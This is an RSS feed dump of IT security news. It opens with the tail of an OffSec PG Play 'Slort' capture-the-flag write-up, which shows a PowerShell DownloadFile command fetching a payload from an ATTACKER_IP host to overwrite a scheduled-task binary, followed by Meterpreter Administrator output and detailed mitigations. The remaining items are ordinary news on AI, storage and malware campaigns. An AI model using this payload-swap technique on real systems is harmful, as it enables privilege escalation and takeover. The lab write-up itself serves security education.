Net.WebClient).DownloadFile('http://&lt;ATTACKER_IP&gt;:8000/tftp.exe','C:\Backup\TFTP.EXE')"</pre><p>DownloadFile writes the file to an exact specified path, making it more reliable than certutil for overwriting an existing binary at a known location.</p><p>The overwrite succeeds. The original TFTP.EXE was not locked by any running process — it executes briefly when the scheduler fires and exits immediately. With no active file lock, the binary can be replaced cleanly between scheduler invocations.</p><h3>5.4 Catching the Administrator Session</h3><p>Wait for the five-minute scheduled task cycle to complete. The scheduler invokes C:\Backup\TFTP.EXE under the Administrator account. The payload executes and connects back to the second Meterpreter handler.</p><p><strong>Session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><p>Administrator.</p><h3>6. Proof of Compromise</h3><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><h3>7. Vulnerability Summary</h3><pre>#   Vulnerability                                        Severity   Impact<br>--  ---------------------------------------------------  ---------  -----------------------------------------------<br>1   PHP allow_url_include enabled on XAMPP               Critical   Remote file inclusion enabling arbitrary RCE<br>2   User input passed to include() without sanitisation  Critical   LFI and RFI via ?page= parameter<br>3   TFTP.EXE world-writable by BUILTIN\Users             Critical   Scheduled task binary replaced — Admin session</pre><h3>8. Defense &amp; Mitigation</h3><h3>8.1 Remote File Inclusion — PHP allow_url_include Enabled</h3><p><strong>Root Cause:</strong> PHP’s allow_url_include directive was enabled in the XAMPP php.ini configuration. This setting permits include() and require() to accept full URLs as arguments, causing PHP to fetch and execute remote files as server-side code. Combined with unsanitised user input in the page parameter, this enabled complete remote code execution.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Disable </strong><strong>allow_url_include immediately and permanently.</strong> There is no legitimate production use case for this setting that cannot be achieved safely through other means. Set it to Off in php.ini:</li></ul><pre>allow_url_include = Off</pre><ul><li>Restart Apache after the change:</li></ul><pre># Linux<br>  systemctl restart apache2<br>  # Windows (XAMPP)<br>  # Use the XAMPP Control Panel or: net stop Apache2.4 &amp;&amp; net start Apache2.4</pre><ul><li><strong>Disable </strong><strong>allow_url_fopen as well, where external URL fetching is not required.</strong> This setting controls whether PHP's file functions can open remote URLs at all. Disabling it eliminates the underlying network fetch capability:</li></ul><pre>allow_url_fopen = Off</pre><ul><li><strong>Keep PHP up to date.</strong> allow_url_include was deprecated in PHP 7.4 and removed entirely in PHP 8.0. Upgrading to a supported PHP 8.x release eliminates the setting as a risk entirely. Running PHP 7.4 on a XAMPP installation in a production or lab context is indefensible — it receives no security patches.</li><li><strong>Harden XAMPP for any network-accessible deployment.</strong> XAMPP is a development stack. Its default configuration — allow_url_include on, phpMyAdmin accessible, MariaDB with no root password — is intentionally permissive for local development. Any XAMPP instance reachable from a network should be hardened against these defaults before use.</li></ul><h3>8.2 User Input Passed to include() Without Sanitisation</h3><p><strong>Root Cause:</strong> The index.php application passed $_GET['page'] directly into PHP's include() function. Any value — a relative path, an absolute path, or a full URL — was accepted and executed without validation, restriction, or sanitisation.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Never pass user-controlled input directly to </strong><strong>include(), </strong><strong>require(), or any file system function.</strong> This is a fundamental PHP security principle. If dynamic page loading is a genuine application requirement, it must be implemented through a strict allowlist — only known, pre-approved values should ever reach a file inclusion call:</li></ul><pre>$allowed_pages = [<br>      'home'  =&gt; 'home.php',<br>      'about' =&gt; 'about.php',<br>      'store' =&gt; 'store.php',<br>  ];<br>  $page = $allowed_pages[$_GET['page']] ?? 'home.php';<br>  include($page);</pre><ul><li>Any value not in the $allowed_pages array silently falls back to the default. An attacker passing a path traversal sequence or a remote URL receives the home page — nothing executes, nothing is disclosed.</li><li><strong>Set </strong><strong>open_basedir in </strong><strong>php.ini to restrict which directories PHP can access.</strong> Even if LFI is exploited, open_basedir confines file access to a specified directory tree and prevents reading files outside of it:</li></ul><pre>open_basedir = C:/xampp/htdocs/site/</pre><ul><li><strong>Conduct a source code review for all </strong><strong>include() and </strong><strong>require() calls.</strong> Every call to these functions in the codebase should be audited. Any that accepts external input without allowlist validation is a vulnerability. This is a straightforward static analysis task that should be part of any application security review.</li><li><strong>Use a Web Application Firewall as a compensating control.</strong> ModSecurity with the OWASP Core Rule Set detects path traversal sequences and remote URL patterns in parameters. It does not replace fixing the root cause, but it adds a meaningful detection and blocking layer.</li></ul><h3>8.3 World-Writable Scheduled Task Binary</h3><p><strong>Root Cause:</strong> C:\Backup\TFTP.EXE inherited (F) — full control — from the parent directory's ACL for BUILTIN\Users. Every authenticated user on the system could overwrite the binary. The scheduled task ran the binary as Administrator on a five-minute cycle. Any attacker with a low-privilege session could replace the binary and wait for the scheduler to provide an Administrator callback.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Remove write permissions for </strong><strong>BUILTIN\Users from any executable invoked by a privileged scheduled task or service.</strong> The binary should be readable and executable by the account running the task, and writable only by Administrators or SYSTEM. Correct the ACL immediately:</li></ul><pre>icacls C:\Backup\TFTP.EXE /remove:g "BUILTIN\Users"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Users:(RX)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "NT AUTHORITY\SYSTEM:(F)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Administrators:(F)"</pre><ul><li><strong>Apply the principle of least privilege to all scheduled task executables and service binaries.</strong> The rule is simple: an account that does not need to modify a binary must not have write access to it, regardless of what inherited permissions the parent directory grants. Audit all scheduled tasks and services regularly:</li></ul><pre>icacls C:\Path\To\TaskExecutable.exe</pre><ul><li>Any result showing (F), (M), or (W) for BUILTIN\Users, Everyone, or Authenticated Users is a critical finding.</li><li><strong>Review the ACL of the parent directory, not just the binary.</strong> The inherited permissions here originated from C:\Backup\ itself. Fixing the directory ACL prevents future executables placed there from inheriting the same dangerous permissions:</li></ul><pre>icacls C:\Backup /inheritance:r<br>  icacls C:\Backup /grant:r "NT AUTHORITY\SYSTEM:(OI)(CI)(F)"<br>  icacls C:\Backup /grant:r "BUILTIN\Administrators:(OI)(CI)(F)"</pre><ul><li><strong>Store scheduled task executables in root-owned, permission-restricted directories.</strong> System utilities and automation scripts used by privileged tasks belong in C:\Windows\System32\, C:\Program Files\, or a custom directory with a deliberately hardened ACL — not in a general-purpose directory like C:\Backup\ where default permissions may be overly permissive.</li><li><strong>Log and alert on modifications to scheduled task executables.</strong> Windows Event ID 4663 (file accessed) and 4670 (permissions changed) can be monitored via Windows Security Auditing or a SIEM. Any write to an executable invoked by a privileged scheduled task should generate an immediate alert:</li></ul><pre>auditpol /set /subcategory:"File System" /success:enable /failure:enable</pre><ul><li><strong>Apply File Integrity Monitoring to critical executables.</strong> Tools such as OSSEC, Wazuh, or Tripwire can monitor specified files for modification and alert in real time. C:\Backup\TFTP.EXE being overwritten between scheduler invocations would have generated an immediate alert with FIM in place.</li></ul><p><em>OffSec PG Play — for educational purposes only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ac72c40761ae" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/slort-rfi-via-php-allow-url-include-writable-scheduled-task-binary-to-administrator-offsec-pg-ac72c40761ae">Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | GEO und SEO: So optimieren Betreiber ihre Websites für ChatGPT & Co.]]></title>
<description><![CDATA[ChatGPT, Perplexity und Googles „KI-Übersicht“ verändern die Suche radikal. GEO soll Websites helfen, auch in KI-Antworten sichtbar und relevant zu werden.]]></description>
<link>https://tsecurity.de/de/3606734/it-nachrichten/heise-geo-und-seo-so-optimieren-betreiber-ihre-websites-fuer-chatgpt-co/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606734/it-nachrichten/heise-geo-und-seo-so-optimieren-betreiber-ihre-websites-fuer-chatgpt-co/</guid>
<pubDate>Thu, 18 Jun 2026 07:47:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ChatGPT, Perplexity und Googles „KI-Übersicht“ verändern die Suche radikal. GEO soll Websites helfen, auch in KI-Antworten sichtbar und relevant zu werden.]]></content:encoded>
</item>
<item>
<title><![CDATA[Crypto Clipper uses Tor and worm-like propagation for persistence and control]]></title>
<description><![CDATA[Microsoft Threat Intelligence analyzed a cryptocurrency clipper campaign that combines clipboard theft, wallet replacement, Tor-based communications, and worm-like propagation. Beyond stealing cryptocurrency transactions, the malware establishes persistent access and enables follow-on activity th...]]></description>
<link>https://tsecurity.de/de/3606444/it-security-nachrichten/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606444/it-security-nachrichten/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/</guid>
<pubDate>Thu, 18 Jun 2026 03:08:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence analyzed a cryptocurrency clipper campaign that combines clipboard theft, wallet replacement, Tor-based communications, and worm-like propagation. Beyond stealing cryptocurrency transactions, the malware establishes persistent access and enables follow-on activity through a lightweight backdoor capability. The post Crypto…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/">Crypto Clipper uses Tor and worm-like propagation for persistence and control</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Crypto Clipper uses Tor and worm-like propagation for persistence and control]]></title>
<description><![CDATA[Microsoft Threat Intelligence analyzed a cryptocurrency clipper campaign that combines clipboard theft, wallet replacement, Tor-based communications, and worm-like propagation. Beyond stealing cryptocurrency transactions, the malware establishes persistent access and enables follow-on activity th...]]></description>
<link>https://tsecurity.de/de/3606420/it-security-nachrichten/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606420/it-security-nachrichten/crypto-clipper-uses-tor-and-worm-like-propagation-for-persistence-and-control/</guid>
<pubDate>Thu, 18 Jun 2026 02:35:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence analyzed a cryptocurrency clipper campaign that combines clipboard theft, wallet replacement, Tor-based communications, and worm-like propagation. Beyond stealing cryptocurrency transactions, the malware establishes persistent access and enables follow-on activity through a lightweight backdoor capability.</p>
<p>The post <a href="https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/">Crypto Clipper uses Tor and worm-like propagation for persistence and control</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog">Microsoft Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Will Lead To Labor Shortages, Bezos Says In Optimistic Talk]]></title>
<description><![CDATA[An anonymous reader quotes a report from Reuters: Artificial Intelligence will lead to labour shortages, not the replacement of humans, Amazon founder Jeff Bezos predicted in a highly optimistic appearance at the VivaTech technology conference in Paris on Wednesday. Bezos put forward a rosy visio...]]></description>
<link>https://tsecurity.de/de/3605787/it-security-nachrichten/ai-will-lead-to-labor-shortages-bezos-says-in-optimistic-talk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605787/it-security-nachrichten/ai-will-lead-to-labor-shortages-bezos-says-in-optimistic-talk/</guid>
<pubDate>Wed, 17 Jun 2026 20:23:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Reuters: Artificial Intelligence will lead to labour shortages, not the replacement of humans, Amazon founder Jeff Bezos predicted in a highly optimistic appearance at the VivaTech technology conference in Paris on Wednesday. Bezos put forward a rosy vision of how technology will help humanity, speaking about projects including his space venture Blue Origin and his new AI startup Prometheus, which is aimed at speeding up physical manufacturing. "I know there's a lot of concern that many people have, including many smart people, that AI is going to make humans redundant and so on," Bezos said. "I totally disagree with this point of view. And I think, in fact, AI is going to create a labor shortage."
 
Half of Americans fear the rise of AI could put them or someone in their household out of work, a Reuters/Ipsos poll found this month. Bezos, the world's fourth-richest person with a net worth around $250 billion, argued that people have "endless" things to do, and are currently limited by barriers that he said AI would lower. One goal of space exploration is to move polluting industries off Earth, said Bezos, whose Blue Origin aims to compete with trillionaire Elon Musk's SpaceX in rockets. "If space travel gets reliable enough and inexpensive enough, and we can get materials from asteroids and near-Earth objects and the moon, then this garden planet can be returned to its pre-Industrial Revolution state," Bezos said.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=AI+Will+Lead+To+Labor+Shortages%2C+Bezos+Says+In+Optimistic+Talk%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F17%2F1711214%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F17%2F1711214%2Fai-will-lead-to-labor-shortages-bezos-says-in-optimistic-talk%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/06/17/1711214/ai-will-lead-to-labor-shortages-bezos-says-in-optimistic-talk?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Post Office delays signing Horizon software replacement contract]]></title>
<description><![CDATA[Lot 2 of the contract to replace Fujitsu’s controversial Horizon EPOS system has still not been signed off]]></description>
<link>https://tsecurity.de/de/3604925/it-nachrichten/post-office-delays-signing-horizon-software-replacement-contract/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604925/it-nachrichten/post-office-delays-signing-horizon-software-replacement-contract/</guid>
<pubDate>Wed, 17 Jun 2026 15:17:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lot 2 of the contract to replace Fujitsu’s controversial Horizon EPOS system has still not been signed off]]></content:encoded>
</item>
<item>
<title><![CDATA[I had a blood clot. An AI diagnosis may have saved my life | Gleb Tsipursky]]></title>
<description><![CDATA[An AI tool is no replacement for a doctor, and regulation is essential. But together, physicians and AI could prove beneficialA calf cramp should not be a brush with death. Mine almost was.For five days, I had what felt like a stubborn muscle spasm in my left calf. It was tender, swollen and gett...]]></description>
<link>https://tsecurity.de/de/3604880/ai-nachrichten/i-had-a-blood-clot-an-ai-diagnosis-may-have-saved-my-life-gleb-tsipursky/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604880/ai-nachrichten/i-had-a-blood-clot-an-ai-diagnosis-may-have-saved-my-life-gleb-tsipursky/</guid>
<pubDate>Wed, 17 Jun 2026 15:03:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An AI tool is no replacement for a doctor, and regulation is essential. But together, physicians and AI could prove beneficial</p><p>A calf cramp should not be a brush with death. Mine almost was.</p><p>For five days, I had what felt like a stubborn muscle spasm in my left calf. It was tender, swollen and getting worse. I assumed it was a muscle problem and went to my chiropractor, who treated it as a muscle issue.</p><p>Gleb Tsipursky, PhD, serves as the CEO of the future-of-work work consultancy <a href="http://disasteravoidanceexperts.com/">Disaster Avoidance Experts</a> and wrote <a href="https://press.georgetown.edu/Book/The-Psychology-of-AI-Adoption-at-Work">The Psychology of Generative AI Adoption at Work</a> (Georgetown University Press, 2026)</p> <a href="https://www.theguardian.com/commentisfree/2026/jun/17/blood-clot-dvt-ai-diagnosis">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Flash pricing — the elephant in the room for enterprise storage]]></title>
<description><![CDATA[For much of the past decade, the all-flash storage market has pushed the narrative that its technology was steadily converging with HDD economics, particularly once factors such as compression, deduplication and data reduction were incorporated into total cost calculations.



This message was co...]]></description>
<link>https://tsecurity.de/de/3604350/it-security-nachrichten/flash-pricing-the-elephant-in-the-room-for-enterprise-storage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604350/it-security-nachrichten/flash-pricing-the-elephant-in-the-room-for-enterprise-storage/</guid>
<pubDate>Wed, 17 Jun 2026 12:08:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For much of the past decade, the all-flash storage market has pushed the narrative that its technology was steadily converging with HDD economics, particularly once factors such as compression, deduplication and data reduction were incorporated into total cost calculations.</p>



<p>This message was compelling enough to become deeply embedded in enterprise infrastructure planning. Buyers were sold solutions on the basis that progress towards flash/HDD pricing parity was inevitable, and, as a result, they could make enterprise-scale spending decisions to go down the all-flash route with full confidence.</p>



<p>The problem with that assertion is that it simply isn’t true and never has been.</p>



<p>So, why raise this point now? Recent comments from the CEO of Everpure (formerly Pure Storage) have brought the underlying issues into sharp focus. In an open letter published in <a href="https://www.blocksandfiles.com/flash/2026/04/23/everpure-reveals-supply-chain-issues-warns-customers/5218662" rel="nofollow">Blocks and Files</a>, he articulates why the company is raising prices amid what he calls the third “once-in-a-decade” supply chain disruption in the past five years.</p>



<p>Be that as it may, the real issue is that flash pricing has become the elephant in the room for an industry now grappling with the economics of AI-era infrastructure at enterprise scale.</p>



<h2 class="wp-block-heading">The devil’s in the detail</h2>



<p>To give this some more context, much of the legacy argument around flash pricing relied on “effective capacity” metrics rather than raw media economics. In practice, these calculations often depended on relatively aggressive assumptions around data reduction ratios and workload behavior. Adding AI use cases into the formula is, as the industry loves to say, “transformational”, but this time, not in a good way.</p>



<p>Today, however, large AI datasets, object storage environments and pre-compressed data frequently deliver much lower reduction rates than many traditional enterprise workloads. At the same time, <a href="https://www.idc.com/resource-center/blog/global-memory-shortage-crisis-market-analysis-and-the-potential-impact-on-the-smartphone-and-pc-markets-in-2026/">hyperscalers and AI infrastructure</a> providers are now consuming unprecedented volumes of high-capacity SSD supply through long-term purchasing commitments, placing sustained pressure on NAND availability and pricing.</p>



<p>The broader implication is that AI exposes a structural mismatch between how enterprise flash economics were marketed during periods of relative supply stability and how those economics behave under sustained, large-scale infrastructure demand.</p>



<p>Let’s be clear, this is no fault of the buyers, who were told they no longer had to think about media tiers and that, and in fact, that the era of tiered storage and hybrid arrays was over. Instead, flash could do it all, affordably.</p>



<p>Neither is it a problem with flash technology, which is perfectly suited to various use cases, from hot data and performance tiers to metadata and checkpointing. Those arguments are won. No, the reason enterprises are now facing such difficult infrastructure economics is the industry pitch that flash would always become a universally cost-effective replacement for HDD as NAND pricing continued its inexorable decline.</p>



<p>As we’ve all witnessed, however, AI has completely destroyed that narrative. Over the past year, the enterprise flash market has experienced some of the <a href="https://nand-research.com/memory-flash-crisisc-update-march-2026/" rel="nofollow">sharpest price increases</a> seen for many years.</p>



<h2 class="wp-block-heading">Mythbusting the all-flash debate</h2>



<p>One of the most revealing aspects of the all-flash debate is that the organizations operating the <a href="https://www.vdura.com/2026/05/20/the-hyperscaler-playbook/" rel="nofollow">world’s largest storage</a> environments never fully embraced all-flash architectures at scale.</p>



<p>What they actually did was continue building mixed-media environments that separate high-performance workloads from bulk storage capacity. This is not because hyperscalers lack the technical capability or financial resources to deploy all-flash infrastructure universally. Quite the opposite; they are geared towards long-term efficiency rather than simplified market narratives.</p>



<p>In practice, hyperscale environments continue using flash where ultra-low latency and high throughput genuinely matter, while relying on lower-cost storage media for less performance-sensitive data. This allows infrastructure economics to scale more sustainably as data volumes increase.</p>



<p>AI is now forcing enterprise infrastructure teams to confront many of the same realities. Yes, training workloads and large-scale data pipelines create enormous storage demands, but not all of that data requires the same performance characteristics.</p>



<p>The broader implication is that storage architecture is increasingly becoming an exercise in economic resilience as much as technical performance. Organizations need the flexibility to tune infrastructure around workload requirements and changing market conditions rather than assuming a single storage medium can economically support every requirement indefinitely.</p>



<p>This reflects the growing recognition that AI-era infrastructure requires a more balanced approach to performance, scalability and, of course, long-term cost exposure than the industry narrative previously argued for.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[63% of workers see AI making the workplace ‘less human’]]></title>
<description><![CDATA[IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the AI and Wo...]]></description>
<link>https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</guid>
<pubDate>Wed, 17 Jun 2026 11:36:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the <a href="https://www.resume-now.com/job-resources/careers/ai-workplace-humanity" rel="nofollow">AI and Workplace Humanity Report</a> from Resume Now.</p>



<p>Workers also believe the implementation of AI will devalue human work (43%), rendering the workplace a “cold, machine-driven environment” (20%) — only 16% say AI will make the workplace more human. Concerns around AI’s impact on <a href="https://www.cio.com/article/3841632/with-critical-thinking-in-decline-it-must-rethink-application-usability.html">critical thinking skills</a> and human connection are growing, and its fast adoption is pushing employees to question exactly how AI will be implemented moving forward. Leaders will need to take workplace culture into consideration with any AI strategy to address these concerns.</p>



<p>“Leaders must be clear and transparent with their AI strategy and principles. And employee voice can be a critical input to that strategy,” says Kaelyn Lowmaster, director analyst of the Gartner HR Practice. “Create channels for employees to surface concerns, ask questions, and suggest AI use cases. Especially as AI-native employees enter the workforce, employees can be a valuable source of information about how to use emerging tools well — and what to avoid.”</p>



<h2 class="wp-block-heading">Reinforce workplace culture to ease AI fears</h2>



<p>Leaders looking to implement AI will need to maintain open lines of communication and transparency around AI and its impact to help get employees on board, even enthusiastic, about AI.</p>



<p>“Dedicated mentorship time, team-based projects, and in-person or hybrid touchpoints can help bring people together. These efforts help strengthen collaboration and sense of connection, so the focus stays on people, not just the technology,” says Megan Slabinski, district president of technology talent solutions at Robert Half.</p>



<p>It’s important to communicate the organization’s goals for AI and to have a clear strategy in place for its implementation. Employees will need reassurance that they have job security and that they won’t be laid off or made redundant in the place of AI. There’s a lot of conflicting news and chatter about AI and its impact on jobs across every industry, so you’ll need to take this into consideration when rolling out any new AI strategy.</p>



<p>“No organization can fully predict the future, but they can provide clarity on employees’ current value and share plans for how their roles will change in the near- to mid-term. Gartner research shows that degree of clarity, more than any other form of support an organization can provide, drives employees to use AI,” says Lowmaster.</p>



<h2 class="wp-block-heading">Curbing potential culture problems stemming from AI</h2>



<p>IT leaders should also build narratives around the positives of AI, sharing how it can boost productivity, while emphasizing the continuing need for human oversight.</p>



<p>“AI is accelerating how organizations process information, automate tasks, and make decisions faster. What it is not doing is replacing the need for human judgment, oversight, and accountability. AI may complete 80% or 90% of a workflow, but the final layer still requires people to validate outcomes, make decisions, and assume responsibility,” says Frank Antezana, CEO of iTech AG.</p>



<p>Employees have growing concerns about <a href="https://www.cio.com/article/4185908/Workers%20express%20growing%20concerns%20around%20AI%E2%80%99s%20impact%20on%20critical%20thinking%20skills%20and%20human%20connection%20%E2%80%93%20its%20fast%20adoption%20is%20pushing%20employees%20to%20question%20exactly%20how%20AI%20will%20be%20implemented%20moving%20forward%20in%20their%20daily%20lives.">AI workslop</a>, the result of undertrained employees using AI to create low-quality outputs that must then be edited or reworked by coworkers. AI is also infamous for making egregious errors at times, requiring human intervention to correct or render effective.</p>



<p>Leaders will need to identify where AI might impact human collaboration as well, trying not to replace the need for interoffice communication, Lowmaster says. For example, if employees are overly reliant on AI to “brainstorm and review their work,” there’s a chance they’ll collaborate less with coworkers on those tasks, she adds. Moreover, if AI “boosts individual employees’ efficiency,” they might start feeling “unsustainable pressure to hit elevated, AI-driven targets for speed or output.”</p>



<p>While Lowmaster acknowledges that “overreliance on AI tools” can sometimes lead to “cases of poor employee judgment or low-quality output,” one of the “biggest barriers” Gartner’s research has uncovered is an overall “lack of trust in the accuracy of AI-generated output.” When employees shift accountability to bots, this can create additional work for other employees who are left to check or redo AI-generated work.</p>



<p>“Any major tech shift can feel impersonal at first, but businesses will always need professionals who can apply the technology and collaborate across teams. Companies that position AI as more of a support tool, rather than a replacement, will likely see stronger employee interest,” says Robert Half’s Slabinski.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten AI Visibility Tools 2026: 7 Lösungen im Vergleich]]></title>
<description><![CDATA[Der Beitrag Die besten AI Visibility Tools 2026: 7 Lösungen im Vergleich erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
Dieser Beitrag wird von Semrush gesponsert LLM Visibility Tools sind 2026 so wichtig ...]]></description>
<link>https://tsecurity.de/de/3603920/it-nachrichten/die-besten-ai-visibility-tools-2026-7-loesungen-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603920/it-nachrichten/die-besten-ai-visibility-tools-2026-7-loesungen-im-vergleich/</guid>
<pubDate>Wed, 17 Jun 2026 09:32:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/17/die-besten-ai-visibility-tools-2026-7-loesungen-im-vergleich/">Die besten AI Visibility Tools 2026: 7 Lösungen im Vergleich</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>Dieser Beitrag wird von Semrush gesponsert LLM Visibility Tools sind 2026 so wichtig wie klassische SEO-Tools. Wer wissen will, wie stark die eigene Marke in ChatGPT, Gemini, Claude oder Perplexity sichtbar ist, braucht spezialisierte AI Brand Monitoring Tools. An der Spitze steht Semrush One mit seinem AI Visibility Toolkit, flankiert von starken Alternativen wie Ahrefs, […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/17/die-besten-ai-visibility-tools-2026-7-loesungen-im-vergleich/">Die besten AI Visibility Tools 2026: 7 Lösungen im Vergleich</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Weibo’s tiny VibeThinker-3B has the AI world arguing over benchmarks again]]></title>
<description><![CDATA[On Sunday, a team of nine researchers at Sina Weibo — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a 14-page technical report to arXiv that sent shockwaves through the AI research community. Their claim: ...]]></description>
<link>https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</guid>
<pubDate>Wed, 17 Jun 2026 03:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
